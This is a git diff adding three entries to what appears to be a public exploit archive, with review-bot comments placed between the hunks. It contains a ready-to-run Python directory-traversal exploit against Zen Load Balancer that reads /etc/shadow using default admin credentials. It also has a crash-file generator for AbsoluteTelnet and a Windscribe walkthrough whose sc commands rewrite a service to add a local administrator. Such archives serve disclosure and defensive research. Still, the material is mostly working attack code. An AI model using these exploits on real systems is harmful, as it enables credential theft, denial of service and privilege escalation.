diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py
new file mode 100755
index 000000000..5ce0b9588
--- /dev/null
+++ b/exploits/cgi/webapps/48308.py
@@ -0,0 +1,31 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
+# Date: 2020-04-10
+# Exploit Author: Basim Alabdullah
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Debian8u2
+#
+# Technical Details:
+# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
+# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
+# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
+#
+# Impact:
+# --------
+# Successful exploitation could allow an attacker to obtain sensitive
+# information.
+
+import requests
+import sys
+
+if len(sys.argv) <2:
+ print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
+ sys.exit(-1)
+else:
+ files=sys.argv[2]
+ url=sys.argv[1]
+ with requests.session() as s:
+ urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
+ response = s.get(urlz, auth=('admin', 'admin'), verify=False)
+ txt=response.text
+ print(response.text)
\ No newline at end of file
diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py
new file mode 100755
index 000000000..0771d435c
--- /dev/null
+++ b/exploits/windows/dos/48305.py
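Review bot: The guard `if len(sys.argv) <2:` lets a run with only the URL past the usage message and into `files=sys.argv[2]`, which raises IndexError; the script reads two positional arguments, so the check should be `if len(sys.argv) < 3:`. The Technical Details describe the traversal as reading arbitrary files, but the request is sent with `auth=('admin', 'admin')`, so what the script exercises is a post-authentication traversal that relies on default credentials — that precondition belongs in the header so the finding is triaged correctly. `verify=False` disables TLS certificate validation and `txt=response.text` is assigned but never used; a one-line comment on the former (presumably for the appliance's self-signed certificate) and dropping the latter would tidy the hunk.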
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-05-02
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
+# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
+# 3.- Open AbsoluteTelnet
+# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
+# 5.- In "username" field paste Clipboard
+# 6.- Select "OK"
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt
new file mode 100644
index 000000000..5f1850679
--- /dev/null
+++ b/exploits/windows/local/48306.txt
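Review bot: The header's `Discovery Date: 2020-05-02` disagrees with the `2020-04-10` date recorded for this entry in files_exploits.csv later in this diff, and step 1 names the script `AbsoluteTelnet 11.12_username_ssh1.py` while the file is committed as `48305.py`; one of each pair is presumably a typo and the metadata should agree. The file handling at the end is the manual `open`/`write`/`close` triple; a context manager is the idiom and also closes the file if `write` raises: `with open("absolutetelnet_username_SSH1.txt", "w") as f:` followed by `    f.write(buffer)`.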
@@ -0,0 +1,52 @@
+# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
+# Date: 2020-04-10
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: https://windscribe.com
+# Version: v1.83 Build 20
+# Tested on: Windows 10, version 1909
+
+In windscribe v1.83 , there is a service via windscribe that every
+authenticated user can modify.
+
+C:\Users\mgthura>sc qc WindscribeService
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : WindscribeService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+That shows that running as Local System this means that the
+BINARY_PATH_NAME parameter can be modified to execute any command on
+the system.
+I'll change binary_path_name with a command that add a user to
+administrators group , so it will be
+
+C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
+administrators pentest /add"
+[SC] ChangeServiceConfig SUCCESS
+
+C:\Users\mgthura>sc stop WindscribeService
+
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+STATE : 3 STOP_PENDING
+(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
+WIN32_EXIT_CODE : 0 (0x0)
+SERVICE_EXIT_CODE : 0 (0x0)
+CHECKPOINT : 0x4
+WAIT_HINT : 0x0
+
+C:\Users\mgthura>sc start WindscribeService
+[SC] StartService FAILED 1053:
+The service did not respond to the start or control request in a timely fashion.
+
+Restarting service will cause the service to fail as the binary path
+would not point into the actual executable of the service.
+However the command will be executed successfully and the user will be
+added to the local administrators group.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 600baaeaa..558ffa2fb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
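Review bot: The title classifies this as an Unquoted Service Path, but nothing in the writeup exercises that: the `sc qc` output only shows an unquoted `BINARY_PATH_NAME`, while the demonstrated issue is that a standard user can rewrite the service configuration with `sc config WindscribeService binPath= ...`, which is a weak service DACL (insecure service permissions) — a different weakness with different remediation. The claim that `every authenticated user can modify` the service is also unsupported as written, because `sc qc` prints configuration, not permissions; the evidence should include the service's security descriptor (e.g. `sc sdshow WindscribeService` output) showing which principals hold change-config rights. Retitling would also require the matching row added to files_exploits.csv further down in this diff to be updated.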
@@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
 48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
+48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
 48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
+48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
+48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,